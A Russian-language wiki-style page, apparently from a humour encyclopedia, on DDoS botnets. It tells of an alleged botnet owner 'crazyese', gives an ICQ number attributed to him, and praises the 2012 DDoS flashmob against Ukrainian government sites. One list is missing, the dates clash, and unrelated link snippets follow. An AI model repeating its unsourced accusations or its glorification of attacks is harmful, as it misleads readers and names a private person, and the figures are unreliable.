В декабре 2010 года совместно с сотрудниками отдела «К» МВД РФ и зарубежными коллегами, которые занимаются IT-безопасностью, в зоне .RU был обнаружен огромный ботнет, который насчитывает порядка 600000 заражённых компьютеров-«зомби» по всему миру. Обнаруженный ботнет управляется с российских серверов (с каких именно, не уточняется), также удалось установить владельца ботнета, им оказался некто под ником «crazyese» (кроме того, что данный человек посещает форумы хакерской тематики и замешан в DDoS атаках на правительственные сайты разных стран, больше ничего не известно). После обнаружения ботнета владельцем этой сети заинтересовались спецслужбы разных стран.

9 февраля 2012 года в сеть попал ICQ номер (831577) того самого «crazyese», номер в сети опубликовал один из конкурентов «crazyese». Тем не менее, владелец номера это и не скрывает, продолжая открыто предлагать ddos услуги.

Недавно стало известно, что с центра управления ботнет-сети того самого «crazyese» были атакованы крупные интернет ресурсы, такие как lenta.ru, vkontakte.ru, yandex.ru, ozon.ru, nasa.gov, kremlin.ru, facebook.com, список сайтов можно перечислять до бесконечности. В конце апреля 2011 года, эксперты зафиксировали новую ботнет-сеть хакера под ником «crazyese», численность которой превышает 4.7 млн заражённых компьютеров по всему миру, 53% из всех «зомби-машин» располагаются в США. Численность новой обнаруженной ботнет-сети растёт с каждым днём. Так же сообщается, что найденный в декабре ботнет из более чем 600000 «зомби-машин» удалось ликвидировать, однако хакер по сей день в розыске.

[править] Как стать DDoS-сером

Кроме вышеописанных методов добровольного участия в атаках на неугодные сайты, существует простой способ стать невольным участником атаки и на вполне угодный сайт. Все, что нужно для этого делать — сидеть под виндой и при этом:

Все вышеперечисленное было не актуально для линуксоидов (у которых зияющих дыр вроде IE6 сроду не было), но всё-таки стало актуально. Был создан Ботнет из Linux-устройств, возросла популярность Linux-ботнетов, ещё ботнет для DDoS-атак. Для маководов тоже стало актуально.

[править] DDoS по-украински

Беспрецедентный пример претворения вышеописанных знаний и умений в жизнь ВНЕЗАПНО грянул первого февраля 2012 года на Украине, когда мусора наехали и разгромили один из популярных файлообменников ex.ua. В результате БОЛЕЕ СУТОК лежали все ключевые правительственные порталы, включая сайт президента, кабинета министров, парламента, гестапо и сайт правящей партии. Еще интереснее эффект — власти вернули обменник!

Кроме профессиональных кулхакеров и владельцев стад ботов ко флешмобу подключились от ста до трехсот тысяч рядовых пользователей, причем интересы их совсем не ограничивались защитой файлообменника. Флешмоб оказался средством консолидации тех, кто искренне желал осинового кола владельцам упомянутых ресурсов, соответственно про файлообменник забыли быстро.

Подробности битовой революции смотрите тут.

Еще по теме:

  • Нотариус щербаковская ул Нотариус щербаковская ул Нотариусы ВАО http://anticor-granit.ru - антикор авто СПб в автосервисе, импортные материалы. Нотариус 111402, Москва, Вешняковская ул., д. 14, корп. 2 +7(495) 9187690 Нотариус МИРАКИНА О.Ю. И САРЫЧИХИНА Е.Ю. 111123, Москва, Владимирская 3-я ул., д. 8, корп. […]
  • Росфиннадзор полномочия Федеральная служба финансово-бюджетного надзора (Росфиннадзор) Федеральная служба финансово-бюджетного надзора является федеральным органом исполнительной власти, осуществляющим функции по контролю и надзору в финансово-бюджетной сфере, а также функции органа валютного […]
  • Правило округления после 5 Правило округления после 5 Округление натуральных чисел Под округлением натурального числа понимают замену его таким ближайшим по значению числом, у которого одна или несколько последних цифр в его записи заменены нулями. Правило округления: Чтобы округлить натуральное число, […]
  • Правила саймона на jail сервере Правила саймона на jail сервере 1. Использовать любые Скрипты/читы и прочее. [Бан на 1 Неделю/Навсегда] 2. Использовать баги игры,карт. [Бан на 30 мин/1 день] 3. Использовать программы, меняющие голос/воспроизводящие посторонние звуки. [Бан на 30 мин/3 часа] 4. Использовать ники […]
  • Що таке обставина правила Що таке обставина правила Гіпермаркет Знань>>Українська мова>>Українська мова 5 клас>>Українська мова 5 клас>> Другорядні члени речення: додаток, означення, обставина. Способи їх вираження різними частинами мови Прочитайте уривок вірша. Знайдіть у ньому назви другорядних […]
  • Распределительный закон умножения конспект урока Конспект урока: Распределительный закон. 6 класс I. Организационный момент. Сообщение темы, целей урока. II. Активизация знаний учащихся. 1 задание. Поставьте верное соответствие между выражением и названием данного выражения. а+в=в+а сочетательный закон умножения а•в=в•а […]
  • Доклад госпошлины Порядок расчета госпошлины Размеры государственной пошлины по делам, рассматриваемым в судах общей юрисдикции, мировыми судьями По делам, рассматриваемым в судах общей юрисдикции, мировыми судьями, государственная пошлина уплачивается в следующих размерах: 1) при подаче искового […]
  • Штрафы платон с 15 ноября Штраф за неоплату проезда в системе "Платон" с 15 июля может возрасти в 4 раза Проект соответствующего закона 1 размещен Минтрансом России на Федеральном портале проектов нормативных актов для проведения независимой антикоррупционной экспертизы. Министерство предлагает с 15 июля […]